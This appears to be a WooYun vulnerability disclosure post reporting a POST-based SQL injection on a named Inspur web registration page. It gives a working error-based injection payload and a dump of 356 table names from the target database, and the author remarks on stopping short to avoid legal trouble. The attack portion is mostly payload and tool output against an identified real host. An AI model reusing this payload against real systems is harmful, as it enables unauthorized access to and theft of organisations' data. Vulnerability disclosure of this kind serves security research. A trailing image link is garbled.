WooYun.org

http://svqd.inspur.com/svqd/jsp/svqd/zhuce/zhuce.jsp
post注入
Payload: {"params":{"javaClass":"ParameterSet","map":{"gszcmc":"ddd' AND 7217=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7217=7217) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'PvnL'='PvnL"},"length":1},"context":{"javaClass":"HashMap","map":{},"length":0}}
Database: svqd
[356 tables]
+--------------------------------+
| ARCHIVES |
| ARCHIVES_HOUSE |
| BIZ_FIELD |
| BIZ_MODEL |
| BUSINESS_STRUCTURE |
| CE_CONTENT |
| CE_DOCUMENTS |
| CE_FILES |
| CE_FILE_TYPE |
| CE_FILE_VERSION |
| CE_STOREAREA |
| CHUKU |
| CKMX |
| CO |
| CO_LINE |
| CUST |
| Cmis_LgcAsset |
| Cmis_LgcAssetAssortment |
| Cmis_LgcAssetCountry |
| Cmis_ZTXSDD1 |
| Cmis_crm_pro_count |
| Cmis_crm_pro_normal |
| Cmis_crm_pro_normal_pse |
| Cmis_crm_pse_productstyle |
| Cmis_crm_pse_productstyle_type |
| DEMO_STRU |
| FACT |
| FORM |
| FORMMAPFIELD |
| FORMMAPTABLE |
| FORMQUERYFIELD |
| FORM_ACCUMULATE_TABLE |
| FORM_FIELD_EXPAND |
| FORM_MAPPING |
| FORM_MAPPING_ITEM |
| FORM_RELATION |
| FORM_RELATION_DYNATABLE |
| FORM_RELATION_MAPFIELD |
| FORM_SUGGEST_DATA |
| FORM_TABLE |
| FORM_TABLE_FIELD |
| FORM_WIDGET |
| FORM_WIDGET_FIELD |
| FRM_COMPONENT |
| FRM_COM_PROPERTY |
| FRM_INTERFACE |
| FRM_METHOD |
| FRM_MODULE |
| FRM_PARAM |
| FRM_REFERENCE |
| FRM_SERVICE |
| HELP_MODULES |
| HELP_URLS |
| ITEM |
| LIVE_ADDRESS |
| LIVE_ADDR_REF |
| LIVE_ATTACH |
| LIVE_ATTACH_ARC |
| LIVE_ATTACH_TEMP |
| LIVE_CONTACT |
| LIVE_CONTACT_GROUP |
| LIVE_DELIVERY_MODE |
| LIVE_ENVELOPE |
| LIVE_ENVELOPE_ARC |
| LIVE_ENVELOPE_TEMP |
| LIVE_GROUP |
| LIVE_INIT_GROUP |
| LIVE_MESSAGE |
| LIVE_MESSAGE_ARC |
| LIVE_MESSAGE_TEMP |
| LIVE_MSGBOX |
| LIVE_PARMS |
| LIVE_PARTY_TYPE |
| LIVE_SYS_PARMS |
| LIVE_USER |
| LIVE_USER_PARMS |
| LS_PLAN |
| LS_TASK |
| MFXX |
| NATIONAL |
| OFFICE_FIELD |
| OFFICE_TEMPLATE |
| OFFICE_TEMPLATE_MODEL |
| OFFICE_WRIT |
| OFFICE_WRIT_BIZ |
| PORTAL_CATEGORY |
| PORTAL_COLUMN |
| PORTAL_LAYOUT |
| PORTAL_PAGE |
| PORTAL_TEMPLATE |
| PORTAL_TEMPLATE_PERMIT |
| PORTAL_USER_LAYOUT |
| PORTAL_WIDGET |
| PUB_APPS |
| PUB_CANT |
| PUB_CANT_TYPE |
| PUB_COLLECTMENU |
| PUB_CONF_ROLES |
| PUB_CONF_ROLESET |
| PUB_COUNTRY |
| PUB_DATA_TYPE |
| PUB_DICT |
| PUB_DICT_ITEM |
| PUB_FUNCTIONS |
| PUB_GLOBAL_POLICY |
| PUB_IDTABLE |
| PUB_LDAP_SYN_USERS |
| PUB_MENU_ITEM |
| PUB_MENU_STRU |
| PUB_MENU_TYPE |
| PUB_MODULES |
| PUB_ONLINE |
| PUB_OPERATIONS |
| PUB_OPERATION_TYPE |
| PUB_ORGAN |
| PUB_ORGAN_EXT |
| PUB_ORGAN_PARMS |
| PUB_ORGAN_PARMS_TYPE |
| PUB_ORGAN_TYPE |
| PUB_ORGAN_WORKDAY |
| PUB_PROXY_PERMISSION |
| PUB_PROXY_PERMISSION_ITEM |
| PUB_ROLES |
| PUB_ROLE_EXT |
| PUB_ROLE_GROUP |
| PUB_ROLE_GROUP_SCOPE |
| PUB_ROLE_OPERATION |
| PUB_ROLE_PRIVS |
| PUB_SECURITY_AUDIT_LOG |
| PUB_STRU |
| PUB_STRU_EXT |
| PUB_STRU_RULE |
| PUB_STRU_TYPE |
| PUB_URLS |
| PUB_USERS |
| PUB_USER_DATA_PERMIT |
| PUB_USER_EMPLOYEE |
| PUB_USER_MAP |
| PUB_USER_POLICY |
| PUB_USER_PROXY |
| PUB_USER_ROLE |
| PUB_USER_SSO |
| PUB_USER_TYPE |
| PUB_WEBSERVICE_COMPENSATION |
| PUB_WORKPLACE |
| RUKU |
| STUDENT |
| STUDENT_INFO |
| T_USER |
| T_USER_NET |
| T_hyxx |
| T_nhqd |
| V_DDXX |
| V_STRU_ORGAN |
| WF_ACTIVITY |
| WF_ACTIVITY_DEF |
| WF_ACTIVITY_DEF_OPERATION_REF |
| WF_ACTIVITY_END |
| WF_ACTIVITY_EXTERNAL_DEF_ECGAP |
| WF_ACTIVITY_LIMIT |
| WF_ACTIVITY_LIMIT_DEF |
| WF_ACTIVITY_LIMIT_END |
| WF_ACTIVITY_RESUME_EVENT |
| WF_ACTIVITY_RESUME_EVENT_END |
| WF_ACTIVITY_SUSPEND_EVENT |
| WF_ACTIVITY_SUSPEND_EVENT_END |
| WF_ACTIVITY_WARN |
| WF_ACTIVITY_WARN_DEF |
| WF_ACTIVITY_WARN_END |
| WF_ACT_DATA_FIELD_DEF |
| WF_ACT_DEF_ADJUNCT_RIGHT |
| WF_ACT_DEF_DOC_RIGHT |
| WF_ACT_DEF_ECGAP_ACTION |
| WF_ACT_DEF_ECGAP_ACTION_DEPEND |
| WF_ACT_DEF_ECGAP_ACTION_END |
| WF_ACT_DEF_ECGAP_ACTION_YIBAN |
| WF_ACT_DEF_ECGAP_FORM |
| WF_ACT_DEF_ECGAP_FORM_ACL |
| WF_ACT_DEF_GRAPH |
| WF_ACT_DEF_JSP_BUTTON |
| WF_ACT_DEF_JSP_FIELD |
| WF_ACT_DEF_JSP_FORM |
| WF_ACT_DEF_PT_ECGAP |
| WF_ACT_DEF_SOURCE_URL_REF |
| WF_ACT_DEF_SUGGEST_ECGAP |
| WF_ACT_EXT_ATTR_DEF |
| WF_ACT_MAPPING_INFO_DEF_BPMN |
| WF_ACT_OPERATION_INVOC_DEF |
| WF_ACT_OUT_MESSAGE_VALUE_DEF |
| WF_ACT_PART_REF_DEF |
| WF_ACT_PK_DATA_FIELD_DEF |
| WF_ACT_SET_DEF |
| WF_ACT_SET_EXT_ATTR_DEF |
| WF_ACT_SET_LIMIT |
| WF_ACT_SET_LIMIT_DEF |
| WF_ACT_SET_REF_DEF |
| WF_ACT_SET_WARN |
| WF_ACT_SET_WARN_DEF |
| WF_ACT_SET_WARN_MSG_DEF |
| WF_ACT_SUBJECT_DATA_FIELD_DEF |
| WF_ACT_TIMER_EVENT_DEF |
| WF_ACT_WARN_MSG_DEF |
| WF_ASSIGNMENT |
| WF_ASSIGNMENT_END |
| WF_ASSIGN_NEXT |
| WF_ASSIGN_PRE |
| WF_ASSIGN_RULE_IN_TURN_DEF |
| WF_ASSIGN_RULE_TYPE_DEF |
| WF_BINDING_DEF |
| WF_BUSINESS_DEF_SERVICE_REF |
| WF_COMPLEX_DATA_TYPE_DEF |
| WF_COMPLEX_GATEWAY_RULE_DEF |
| WF_DAIBAN_TASK_VIEW |
| WF_DAI_BAN_TASK |
| WF_DATA_FIELD |
| WF_DATA_FIELD_DEF |
| WF_DATA_FIELD_END |
| WF_DATA_FIELD_MAPPING_DEF |
| WF_DEFAULT_SUBJECT_DEF |
| WF_DEFAULT_SUBJECT_QUERY_DEF |
| WF_ECGAP_FORM_ACTION_DEF |
| WF_ELEMENT_DEF |
| WF_END_DEF_GRAPH |
| WF_END_TASK |
| WF_END_TASK_VIEW |
| WF_FORM_ACTION_GROUP_DEF |
| WF_FORM_ACTION_LOG |
| WF_FREEDOM_PROCESS_END |
| WF_JSP_FORM_ACTION_DEF |
| WF_JSP_FORM_DEF |
| WF_JSP_FORM_FIELD_DEF |
| WF_JSP_FORM_REQUEST_URL_DEF |
| WF_MESSAGE_DEF |
| WF_MONITOR_TASK_VIEW |
| WF_MULTI_INSTANCE_RULE_DEF |
| WF_OPERATION_DEF |
| WF_PARTICIPANT_DEF |
| WF_PORT_DEF |
| WF_PORT_TYPE_DEF |
| WF_PROCESS |
| WF_PROCESS_DEF |
| WF_PROCESS_DEF_MODELING |
| WF_PROCESS_DEF_MODELING_BPMN |
| WF_PROCESS_DEF_SERVICE_REF |
| WF_PROCESS_END |
| WF_PROCESS_LIMIT |
| WF_PROCESS_LIMIT_DEF |
| WF_PROCESS_LIMIT_END |
| WF_PROCESS_MERGE |
| WF_PROCESS_MONITOR |
| WF_PROCESS_MONITOR_DEF |
| WF_PROCESS_RESUME_EVENT |
| WF_PROCESS_RESUME_EVENT_END |
| WF_PROCESS_SUSPEND_EVENT |
| WF_PROCESS_SUSPEND_EVENT_END |
| WF_PROCESS_TYPE |
| WF_PROCESS_WARN |
| WF_PROCESS_WARN_DEF |
| WF_PROCESS_WARN_END |
| WF_PROC_CREATE_MANUAL_DATA_REF |
| WF_PROC_DEF_HAS_DOC |
| WF_PROC_DEF_MODELING_DATA_REF |
| WF_PROC_DEF_PAGE_BUTTON_DEF |
| WF_PROC_DEF_SOURCE_REF |
| WF_PROC_DEF_SOURCE_SUBJECT_REF |
| WF_PROC_EXT_ATTR_DEF |
| WF_PROC_MAPPING_INFO_DEF_BPMN |
| WF_PROC_SUBJECT |
| WF_PROC_SUBJECT_COLUMN_DEF |
| WF_PROC_SUBJECT_DEF |
| WF_PROC_SUBJECT_QUERY_DEF |
| WF_PROC_SUBJECT_SC_FIELD_DEF |
| WF_PROC_SUBJECT_SC_TYPE_DEF |
| WF_PROC_SUBJECT_TABLE_DEF |
| WF_PROC_SUBJ_QUERY_HELP_DEF |
| WF_PROC_SUBJ_QUERY_SELECT_DEF |
| WF_PROC_SYS_SUBJECT |
| WF_PROC_WARN_MSG_DEF |
| WF_PROPERTY_CONFIG |
| WF_SERVICE_CALL_EXCEPTION |
| WF_SERVICE_DEF |
| WF_SPLIT_INST_JOIN |
| WF_START_DEF_GRAPH |
| WF_START_TIMER_EVENT_DEF |
| WF_SYS_SUBJECT_DEF |
| WF_SYS_SUBJECT_QUERY_DEF |
| WF_SYS_SUBJECT_SC_DEF |
| WF_SYS_SUBJECT_SC_FIELD_DEF |
| WF_SYS_SUBJ_QUERY_HELP_DEF |
| WF_SYS_SUBJ_QUERY_SELECT_DEF |
| WF_TRANSITION |
| WF_TRANSITION_BACK |
| WF_TRANSITION_BACK_END |
| WF_TRANSITION_DEF |
| WF_TRANSITION_END |
| WF_TRIP_PROXY_ASSIGNMENT |
| WF_TRIP_PROXY_OPERATION_DEF |
| WF_TRIP_PROXY_PROC_DEF |
| WF_TYPE_SUBJECT_COLUMN_DEF |
| WF_TYPE_SUBJECT_DEF |
| WF_TYPE_SUBJECT_QUERY_DEF |
| WF_TYPE_SUBJECT_SC_FIELD_DEF |
| WF_TYPE_SUBJECT_SC_TYPE_DEF |
| WF_TYPE_SUBJECT_TABLE_DEF |
| WF_TYPE_SUBJ_QUERY_HELP_DEF |
| WF_TYPE_SUBJ_QUERY_SELECT_DEF |
| WF_TYPE_TASK_LIST_PAGE_BTN_DEF |
| WF_YIBAN_END_TASK_VIEW |
| WF_YIBAN_TASK_VIEW |
| WF_YI_BAN_TASK |
| ZDDCX |
| ZSOLL |
| ZSOLL_FH |
| ZSOLL_SN |
| ZWLZT1 |
| aaaa |
| aaaaaa |
| cmis_pse_cp_ls |
| cmis_pse_ls |
| cpjg |
| dpqy |
| pa |
| pub_cant13 |
| pub_cant14 |
| qyrw |
| shxx |
| test |
| u_cpjg |
| u_cxqy |
| u_ddxx |
| u_ddxx_bh |
| u_ddxx_mx |
| u_ddxx_mx_bh |
| u_dllx |
| u_erpkhzsj |
| u_gsjbxx |
| u_hyxx |
| u_hyxx_fwq |
| u_jbxx |
| u_jbxx_his |
| u_jrll |
| u_pjjg |
| u_qdxx |
| u_qdxx_fj |
| u_qdzc |
| u_qdzc_tj |
| u_qyxx |
| u_ryxx |
| u_ryxx_ry |
| u_swxx |
| u_xszb |
| uploadfiles |
| v_u_ddxx_dp |
| v_u_dls |
| yhyc |
| zcxx
有很多数据，怕被查水表 点到为止了 望珍重

<img src="/upload/201510/1912012823ead3171javascrjavascript:void(0)ipt:void(0)71bb63d6deb1ad2d769ecff.png" alt="2.png" />